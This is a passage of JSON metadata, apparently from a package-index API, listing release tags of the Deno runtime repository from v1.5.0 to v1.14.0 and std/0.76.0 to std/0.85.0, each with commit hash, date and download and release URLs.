,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","depen